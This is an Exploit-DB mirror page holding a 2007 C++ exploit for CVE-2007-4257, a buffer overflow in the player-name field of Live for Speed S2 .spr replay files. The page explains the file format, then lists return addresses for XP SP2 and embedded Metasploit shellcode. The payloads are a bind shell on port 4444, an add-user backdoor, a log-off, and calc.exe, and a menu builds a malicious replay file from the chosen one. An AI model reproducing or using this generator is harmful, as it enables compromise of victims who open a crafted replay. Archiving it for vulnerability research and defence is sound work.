- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4263
- Проверка EDB
-
- Пройдено
- Автор
- N00B
- Тип уязвимости
- LOCAL
- Платформа
- WINDOWS
- CVE
- cve-2007-4257
- Дата публикации
- 2007-08-06
C++:
/**
*****
**************************************************************************
0day Live for speed patch x s2 /s1 and demo local .Spr File buffer over flow
Spr file's are also exploitable although i had to go about it a different
Way,At first it wasn't possible to do a jmp esp,But with a little more buffer i
Managed to get it to point to our shell code,The .spr file's are single player
Replay file's the structure is totally different,This is why i wrote the second
Exploit,Because you cant use the mpr file's.It's totally different to exploit this.
Where the mpr file the buffer over flow was in the car name.This is in the actual
user name of the person in the race.The eip was over written in a totally different
place.Where the .mpr file's go in the mpr folder the spr file's have a totally
different folder for single player Replay file's.So i had to write a different
exploit code.Try it put the mpr file inside the spr folder it will throw an
error header check wrong file,This is why had to write the second exploit using
my own local exploit file template.I have added the .spr file description so
you can see for your self the Difference's in the file structure.Remember
this has to go in the spr folder.
Compile with dev c++ 4.9.9.2
------------------------------
.Spr buffer over flow is here. |
32 char 64 user name |
-----------------------------
----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
=========================================
SPR file header format for LFS S2 : 0.5X9
=========================================
FILE DESCRIPTION :
==================
num unit offset description
--- ---- ------ -----------
6 char 0 LFSSPR : do not read file if no match
1 byte 6 game version : ignore
1 byte 7 game revision : ignore
1 byte 8 SPR version : ignore
1 byte 9 reserved : -
1 byte 10 reserved : -
1 byte 11 qual mins : qualifying time
1 byte 12 laps byte : laps / hours (see notes)
1 byte 13 skill : skill level (0,1,2,3,4)
1 byte 14 wind : 0=off 1=weak 2=strong
1 byte 15 hotlap mode : 0=no 1=yes
8 char 16 LFS version : text, ends 0
4 char 24 short track name : e.g. BL2R
1 byte 28 added mass : hotlap only
1 byte 29 intake restrict : hotlap only
1 byte 30 0 : -
1 byte 31 0 : -
32 char 32 track name : text, ends 0
32 char 64 user name : text, ends 0
32 char 96 car name : text, ends 0
1 byte 128 config : 1,2,3.. (first config is 1)
1 byte 129 reversed : 0=no 1=yes
1 byte 130 weather : 0,1,2.. (first weather is 0)
1 byte 131 number of players : total cars in race
1 word 132 player flags : driver settings (see NOTES)
1 byte 134 hlvc best lap : the lap of the split times
1 byte 135 number of splits : including lap time
1 time 136 split 1 : msht time (1st check point)
1 time 140 split 2 : msht time
1 time 144 split 3 : msht time
1 time 148 split 4 : msht time
2 int 152 0 : -
32 char 160 local player name : including colours
----------
Disclaimer
----------
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Educational use only..!!
-------------------------------------------------------------------------
Vendor's web site:www.liveforspeed.net.
Affected version's Live for Speed S2 ALPHA PATCH 0.5X.
Special thank's to str0ke.
****************************************************************
*****
**/
#include <windows.h>
#include <stdio.h>
#include <conio.h>
#define Credits_to "Credit's to n00b for finding this buffer over flow"
#define Spr_file "exploit.spr"
//If none of the jmp esp work for you find your own and define it!!
#define JMP_ESP_English "\x0A\xAF\xD8\x77" //user32.dll xp sp2 english
#define CALL_ESP_French "\x8b\x51\x81\x7c" //Kernel32.dll xp sp2 french
#define JMP_ESP_German "\x47\x74\xd2\x77" //user32.dll xp sp2 german
char file_header1[] =
"\x4c\x46\x53\x53\x50\x52\x00\xfa\x0b\x14\x06\x00\x03\x04\x01\x00"
"\x30\x2e\x35\x58\x31\x30\x00\x00\x41\x53\x33\x00\x00\x00\x00\x00"
"\x41\x73\x74\x6f\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x6d\x75\x68\x61\x61\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x55\x46\x20\x31\x30\x30\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x03\x00\x00\x01\x04\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
char file_header2[] =
"\x63\x61\x72\x6c"
"\x6f\x73\x20\x5e\x6c\x5e\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd2\x91\x00\x00"
"\x67\x95\x78\x50\x55\x46\x31\x5f\x44\x45\x46\x41\x55\x4c\x54\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x48\x45\x4c\x5f\x42\x46\x31\x5f"
"\x4e\x48\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x30\x23\x00\x00\xe6\xd4\xa4\xfd"
"\x7d\x24\x3f\xff\x00\x00\x00\x00\x63\x61\x72\x6c\x6f\x73\x20\x5e"
"\x6c\x5e\x72\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x6f\x6f\x6f\x6f\x6f\x48\x41\x00\x00\x04\x02\x20\x01\x00\x00"
"\x42\x46\x31\x5f\x4e\x48\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x17\x32\x1e\x00\x55\x46\x20\x31\x30\x30\x30\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\xcd\x30\xe4\x86\x1d\x4c\x2b\xc1\xec\xa9\x6c\xca"
"\x08\xa8\x39\x6f\x76\x96\xf8\x8d\x57\xc8\x54\x63\x3b\x18\xe3\xb0"
"\x2a\x78\x11\x2f\xf2\xd7\x72\x02\x81\x9f\xc5\x5b\x99\x96\x57\xf1"
"\x21\x76\xe6\x3f\x93\x01\xe0\xcc\x57\xa6\x05\xc0\x22\xf7\xfd\x28"
"\x6a\x90\x54\x48\x38\x2b\xeb\x86\x45\x44\xc6\x42\x07\xeb\x25\x30"
"\x94\xb6\xda\x60\x39\xf8\x54\x9a\x2e\x0c\xe7\x47\x54\xd8\xdd\x8a"
"\xf4\xdc\x18\xfa\x22\xf7\xfd\x28\x6a\x90\x54\x48\x94\xfd\xa8\x3a"
"\x12\x07\x6d\x93\xf6\xc2\x8f\xda\xe2\x46\x1f\x83\x44\x45\x46\x41"
"\x55\x4c\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00\x96\x5c\x0a\x00"
"\x96\x5c\x0a\x00\x0a\x0a\x0a\x00\x0a\x0a\x0a\x00\x78\x78\x78\x00"
"\x78\x78\x78\x00\x0a\x0a\x0a\x00\x0a\x0a\x0a\x00\x00\x00\x03\x00"
"\x00\x00\xfc\x00\xa1\x08\xc8\x1d\x00\x01\xfc\x00\x9d\x81\x2a\x08"
"\x00\x02\xfc\x00\x83\x7c\x5a\x8b\x56\x02\xfe\x00\x01\x0d\x02\x00"
"\x00\x03\xfc\x00\x40\xb2\x1c\x33\x00\x04\xfc\x00\xac\xf5\xac\xb8"
"\x08\x04\xff\x00";
//shellcode from www.metasploit.com bind shell port 4444 351 byte's
char shellcode[]=
"\xfc\xbb\xe6\x02\xd5\x0f\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85"
"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x1a\x68\x3e\x42\x0a\x94\x3f"
"\xa2\x35\x07\x4b\x31\xed\xec\xc0\x8f\xd1\x67\xaa\x0a\x51\x79\xbc"
"\x9e\xee\x61\xc9\xfe\xd0\x90\x26\x49\x9b\xa7\x33\x4b\x75\xf6\x83"
"\xd5\x25\x7d\xc3\x92\x32\xbf\x0e\x57\x3d\xfd\x64\x9c\x06\x55\x5f"
"\x75\x0d\xb0\x14\xda\xc9\x3b\xc0\x83\x9a\x30\x5d\xc7\xc3\x54\x60"
"\x3c\xf8\x48\xe9\x4b\x92\xb4\xf1\x2a\xa9\x84\xd2\xc9\xa6\xa4\xd4"
"\x9a\xf8\x26\x9e\xed\xe4\x9b\x2b\x4d\x1c\xba\x43\xc0\x52\x4c\x78"
"\x8c\x95\x86\xe6\x7e\x0f\x4f\xd4\xb2\xa7\xf8\x69\x81\x68\x53\x71"
"\x35\xfe\x90\x60\x4a\xc5\x76\x84\x65\x66\xfe\x9f\xec\x19\xed\x68"
"\xf3\x4c\x84\x6a\x0c\xbe\x30\xb2\xfb\xcb\x6c\x13\x03\xe5\x3c\xcf"
"\xa8\x5a\x90\xac\x1d\x1f\x45\xcc\x72\xf9\x01\x23\x2f\x63\x81\xca"
"\x2e\xfe\x4d\x69\xaa\x70\x49\x26\x34\xa6\x3f\xd9\x9b\x13\x3f\x09"
"\x73\x3f\x12\x84\x6d\x68\x92\x0f\x3e\xc3\x93\x60\xa9\x0e\x22\x07"
"\x63\x87\x4a\xd1\x24\x73\xe1\x8b\x3b\xab\x9a\x5c\x23\x32\x5b\xe5"
"\xfc\x3b\xb5\x43\xfc\x13\x5c\x06\x66\xf5\xc9\xb5\x0b\x70\xec\x50"
"\x84\xdb\xc6\x68\xad\x3c\x72\x35\x27\x20\xb2\x75\xc4\x0e\x4b\x37"
"\x06\xb0\xf6\x94\xcb\xc1\x8d\xdc\x40\x72\xda\x75\xe5\x7a\xae\x90"
"\xf6\xf7\x95\x63\xde\xac\x42\xce\x8e\x03\x3c\x84\x31\xf2\xef\x0d"
"\x63\x0b\xdf\xc6\x2e\x2a\xe5\xd8\x62\x33\x30\x8e\x7b\x34\x8a\xb0"
"\x54\x41\xa2\xb2\xd6\x91\x29\xb4\x0f\x4b\x4d\x9a\xd8\x9b\x3b\x1f"
"\x46\x08\xc3\xf6\x87\x7e\x3b\xf7\x77\x7e\x3c\xf7\x77";
//win32 execute calc.exe http://metasploit.com
char calc_shellcode[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"
"\x42\x50\x42\x50\x42\x30\x4b\x58\x45\x54\x4e\x33\x4b\x38\x4e\x57"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x58\x4f\x44\x4a\x41\x4b\x38"
"\x4f\x35\x42\x42\x41\x30\x4b\x4e\x49\x34\x4b\x58\x46\x33\x4b\x58"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"
"\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48"
"\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54"
"\x4b\x58\x4f\x35\x4e\x31\x41\x50\x4b\x4e\x4b\x38\x4e\x41\x4b\x38"
"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x50\x43\x4c\x41\x53"
"\x42\x4c\x46\x46\x4b\x48\x42\x44\x42\x43\x45\x38\x42\x4c\x4a\x37"
"\x4e\x50\x4b\x48\x42\x44\x4e\x50\x4b\x48\x42\x57\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x30\x4b\x4e\x49\x30\x4b\x58\x42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x48\x4a\x46\x4e\x43\x4f\x55\x41\x43"
"\x48\x4f\x42\x56\x48\x55\x49\x58\x4a\x4f\x43\x38\x42\x4c\x4b\x57"
"\x42\x55\x4a\x46\x4f\x4e\x50\x4c\x42\x4e\x42\x46\x4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x41\x56"
"\x4e\x46\x43\x56\x50\x42\x45\x56\x4a\x37\x45\x36\x42\x30\x5a";
// win32_adduser PASS=w00t EXITFUNC=seh USER=w00t http://metasploit.com
char adduser_shellcode[]=
"\xfc\xbb\xfb\xe2\x33\x0b\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85"
"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x07\x0a\x77\x0b\xf7\xcb\xf3"
"\x4e\xcb\x40\x7f\x54\x4b\x56\x6f\xdd\xe4\x40\xe4\xbd\xda\x71\x11"
"\x08\x91\x46\x6e\x8a\x4b\x97\xb0\x14\x3f\x5c\xf0\x53\x38\x9c\x3b"
"\x96\x47\xdc\x57\x5d\x7c\xb4\x83\x9a\xf7\xd1\x47\xfd\xd3\x18\xb3"
"\x64\x90\x17\x08\xe2\xf9\x3b\x8f\x1f\x8e\x58\x04\xde\x7b\xe9\x46"
"\xc5\x7f\x29\x47\xc5\x1b\x26\xe8\xf5\x66\xf8\x91\xf9\xe3\xb9\x6d"
"\x89\x83\x25\xc3\x06\x0b\x5e\xf0\x10\x40\xde\xb6\x23\x56\xdf\x3d"
"\x4b\x6a\x80\x70\x7a\xf2\x68\xfa\x7a\x71\x54\x87\x2a\x1d\xa5\xf2"
"\xcf\x82\x2d\x9b\x2e\xb6\xa0\xcc\x31\x21\xdf\x9f\xa9\x83\x45\x18"
"\x57\xfb\xaa\xbb\xb7\x95\xd1\x4f\x98\x1c\x69\xd5\xaa\xfe\xfa\x25"
"\x7b\x8a\x24\x31\x4b\x42\x51\x9d\x84\xe3\xdd\x99\xfa\xc5\xfb\x01"
"\x95\x6c\x70\x62\x05\x01\x1b\x03\xb9\xba\xa9\xac\x34\x34\x6e\x72"
"\xd3\xd9\x07\x1a\x72\x52\xac\x90\xe5\xe0\x23\x27\x95\x28\xcb\xf7"
"\x69\x5c\x13\xd7\xc8\xd8\x17\x27\xcb\xe0\x97\x27\xcb";
//Log user off shell code http://metasploit.com
char Log_off_shellcode[]=
"\xfc\xbb\x25\x48\xf4\xb3\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3\x85"
"\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\xd9\xa0\xb0\xb3\x21\x31\xb2"
"\xf1\x1d\xba\xb8\xfc\x25\xbd\xaf\x74\x9a\xa5\xa4\xd4\x04\xd7\x51"
"\xa3\xcf\xe3\x2e\x35\x21\x3a\xf1\xaf\x11\xb9\x31\xbb\x6e\x03\x7b"
"\x49\x71\x41\x97\xa6\x4a\x11\x4c\x43\xd9\x7c\x07\x14\x05\x7e\xf3"
"\xcd\xce\x8c\x48\x99\x8f\x90\x4f\x76\xa4\xb5\xc4\x89\x51\x4c\x86"
"\xad\xa1\x8c\x06\x6e\xcd\x99\x29\x5e\x88\x5e\xd1\x92\x19\x1e\x2e"
"\x20\x6d\x83\x83\xbd\xe5\xb3\x30\xc8\x7e\x43\x76\xcb\x80\x44\xfc"
"\xa4\xbc\x1b\x33\xc3\xdc\xf5\xba\xd3\x9f\x3a\xc7\x73\xf7\x4a\xb2"
"\x70\x58\xc3\x5b\x86\xec\x1d\x0b\x88\x17\x52\xdb\x03\xa3\xf1\x74"
"\x9b\x25\xda\xa7\x0f\x99\x37\xcc\xef\xe9\x77\x2c\xf0\x09\x78\x2c"
"\xf0";
int main(){
FILE *File;
int i = 0;
if((File=fopen(Spr_file,"wb")) == NULL){
printf("fuck We are Unable to build the file %s",Spr_file);
exit(0);
}
system("cls");
printf("\n *************************************************");
printf("\n *Live for speed .Spr local file buffer overflow *");
printf("\n *************************************************");
printf("\n * Special thanks to Str0ke *");
printf("\n *************************************************");
printf("\n * Shout's ~ str0ke ~ c0ntex ~ marsu ~v9@fakehalo*");
printf("\n * Date : August 4 2007 *");
printf("\n *************************************************");
printf("\n * Creating .Spr replay File please wait !! *");
printf("\n *************************************************");
Sleep(4000);
system("cls");
{
for(i=0;i<sizeof(file_header1)-1;i++)
fputc(file_header1[i],File);
for (int i=0;i<89;i++)
fputs("A", File);
}
int input;
printf( "[1]. English Jmp_esp win xp sp2 \n" );
printf( "[2]. French Call_esp win xp sp2 \n" );
printf( "[3]. German Jmp_esp win xp sp2 \n" );
printf( "[4]. To exit and cancel\n" );
printf( "Pick your jmp esp: " );
scanf( "%d", &input );
switch ( input ) {
case 1:
fputs(JMP_ESP_English,File);
break;
case 2:
fputs(CALL_ESP_French,File);
break;
case 3:
fputs(JMP_ESP_German,File);
break;
case 4:
exit(0);
break;
Sleep(500);
}
system("cls");
printf( "[1].Bind to port shell code port 4444\n");
printf( "[2].Execute calc.exe shell code\n");
printf( "[3].Add user shell code PASS=w00t USER=w00t\n");
printf( "[4].Shut down user's computer\n");
printf( "[5].To exit and cancel\n" );
printf( "Pick your shell code: " );
scanf( "%d", &input );
switch ( input ) {
case 1:
for(i=0;i<sizeof(shellcode)-1;i++)
fputc(shellcode[i],File);
break;
case 2:
for(i=0;i<sizeof(calc_shellcode)-1;i++)
fputc(calc_shellcode[i],File);
break;
case 3:
for(i=0;i<sizeof(adduser_shellcode)-1;i++)
fputc(adduser_shellcode[i],File);
break;
case 4:
for(i=0;i<sizeof(Log_off_shellcode)-1;i++)
fputc(Log_off_shellcode[i],File);
break;
case 5:
exit(0);
break;
}
Sleep(500);
for (int i=0;i<300;i++)
fputs("B", File);
for(i=0;i<sizeof(file_header2)-1;i++)
fputc(file_header2[i],File);
{
fclose(File);
system("cls");
printf("%s successfully created..\n",Spr_file);
printf("%s \n",Credits_to);
Sleep(3000);
return 0;
}
}
// milw0rm.com [2007-08-06]
- Источник
- www.exploit-db.com